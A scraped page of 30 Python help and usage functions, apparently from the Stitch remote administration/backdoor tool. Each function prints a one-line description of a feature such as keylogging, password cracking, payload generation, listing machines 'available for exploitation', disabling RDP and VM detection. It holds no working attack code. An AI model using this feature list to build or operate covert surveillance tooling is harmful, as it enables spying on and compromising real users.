Exemplo n.º 1
0
def st_help_keylogger():
    st_print(
        "[*] Records keystrokes of the user. Allowing you to view the status, start, stop, and dump the keystokes to screen."
    )
    usage_keylogger()
Exemplo n.º 2
0
def st_help_touch():
    st_print('[*] Creates a file with no contents.')
    usage_touch()
Exemplo n.º 3
0
def st_help_upload():
    st_print('[*] Uploads a file/dir to the system.')
    usage_upload()
Exemplo n.º 4
0
def st_help_stitchgen():
    st_print('[*] Generates stitch payloads based on running OS.')
    usage_stitchgen()
Exemplo n.º 5
0
def st_help_sudo():
    st_print("[*] Runs the preceding command with admin priveleges.")
    usage_sudo()
Exemplo n.º 6
0
def st_help_shell():
    st_print('[*] Opens a shell prompt of the requested session.')
    usage_shell()
Exemplo n.º 7
0
def st_help_ssh():
    st_print('[*] Attempts to open a ssh connection to the requested host.')
    usage_ssh()
Exemplo n.º 8
0
def st_help_lsmod():
    st_print('[*] Displays list of all installed drivers.')
    usage_lsmod()
Exemplo n.º 9
0
def st_help_listen():
    st_print('[*] Server binds to given port to listen for connections.')
    usage_listen()
Exemplo n.º 10
0
def st_help_ls():
    st_print('[*] Displays a list of files and subdirectories in a directory.')
    usage_ls()
Exemplo n.º 11
0
def usage_crackpassword():
    st_print('[*] Usage: crackpassword\n')
Exemplo n.º 12
0
def st_help_logintext():
    st_print("[*] Sets the text of the system's login screen.")
    usage_logintext()
Exemplo n.º 13
0
def st_help_lockscreen():
    st_print("[*] Enters the system's lock screen.")
    usage_lockscreen()
Exemplo n.º 14
0
def st_help_location():
    st_print("[*] Gives public IP and estimate geo location of the system.")
    usage_location()
Exemplo n.º 15
0
def st_help_screenshot():
    st_print('[*] Takes a screenshot of the screen.')
    usage_screenshot()
Exemplo n.º 16
0
def st_help_more():
    st_print('[*] Displays ouput of file path.')
    usage_more()
Exemplo n.º 17
0
def st_help_sessions():
    st_print('[*] Displays machines available for exploitation.')
    usage_sessions()
Exemplo n.º 18
0
def st_help_popup():
    st_print("[*] Displays popup box with custom message.")
    usage_popup()
Exemplo n.º 19
0
def st_help_showkey():
    st_print(
        '[*] Displays the active encrypted AES key used for payload creation.')
    usage_showkey()
Exemplo n.º 20
0
def st_help_pwd():
    st_print('[*] Displays the name of the current directory.')
    usage_pwd()
Exemplo n.º 21
0
def st_help_start():
    st_print('[*] Starts the desired file.')
    usage_start()
Exemplo n.º 22
0
def st_help_pyexec():
    st_print('[*] Runs python script on the system.')
    usage_pyexec()
Exemplo n.º 23
0
def usage_disableRDP():
    st_print('[*] Usage: disableRDP\n')
Exemplo n.º 24
0
def st_help_ps():
    st_print('[*] Displays list of all running processes.')
    usage_ps()
Exemplo n.º 25
0
def st_help_sysinfo():
    st_print('[*] Displays system information.')
    usage_sysinfo()
Exemplo n.º 26
0
def st_help_scanreg():
    st_print('[*] Display information on Windows Registry.')
    usage_scanreg()
Exemplo n.º 27
0
def st_help_unhide():
    st_print('[*] Unhides the specified file/dir from the user.')
    usage_unhide()
Exemplo n.º 28
0
def usage_dir():
    st_print('[*] Usage: dir\n')
Exemplo n.º 29
0
def st_help_vmscan():
    st_print('[*] Detects if the system is a virtual machine.')
    usage_vmscan()
Exemplo n.º 30
0
def st_help_ipconfig():
    st_print("[*] Displays the system's IP configuration.")
    usage_ipconfig()